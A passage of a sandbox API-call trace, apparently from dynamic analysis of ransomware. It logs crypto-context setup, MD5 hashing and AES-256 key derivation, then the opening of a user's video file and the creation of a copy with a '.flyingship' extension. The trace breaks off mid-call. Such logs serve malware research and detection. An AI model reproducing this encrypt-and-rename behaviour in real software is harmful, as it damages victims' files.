CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.922] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0192.923] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.923] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.923] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0192.923] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.923] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.923] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.923] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.924] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.924] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.924] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.924] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.924] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.924] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.924] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.924] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.924] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0192.924] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.934] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.934] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.934] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.934] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.934] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.934] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.934] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.934] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.934] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.934] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.934] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.935] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.935] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.935] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.935] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.935] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.935] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.935] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.935] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0192.935] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.935] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.935] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.935] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.935] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0192.935] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.935] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.935] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.935] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.936] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.936] CryptHashData (hHash=0x90af58, pbData=0x8dec68, dwDataLen=0x19, dwFlags=0x1) returned 1 [0192.936] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.936] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.936] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.936] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.936] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.936] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.936] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.936] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.936] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0192.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.937] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.937] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0192.937] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.937] CryptDestroyHash (hHash=0x90af58) returned 1 [0192.937] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.937] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.937] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.937] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.937] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.937] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cwkru.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0192.939] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.939] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0192.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0192.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0192.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0192.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0192.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0192.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0192.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0192.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.939] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0192.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0192.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0192.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0192.940] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0192.940] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0192.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0192.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0192.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0192.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0192.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0192.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0192.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0192.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0192.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0192.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0192.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0192.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0192.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0192.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0192.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0192.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0192.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0192.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0192.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0192.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0192.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0192.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0192.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0192.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0192.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0192.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0192.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0192.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0192.942] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 0x11 [0192.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0192.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0192.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0192.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0192.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0192.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0192.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0192.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0192.943] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.flyingship.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cwkru.flyingship.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0192.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0192.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0192.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0192.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0192.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0192.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0192.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0192.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.945] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0192.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0192.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0192.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0192.945] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0192.945] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0192.945] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0192.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0192.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.945] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.946] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0192.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0192.946] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0192.946] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0192.946] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x1ceb, lpOverlapped=0x0) returned 1 [0192.948] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0192.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0192.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0192.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0192.949] RtlAllocateHeap (HeapHandle=0x8a0000, 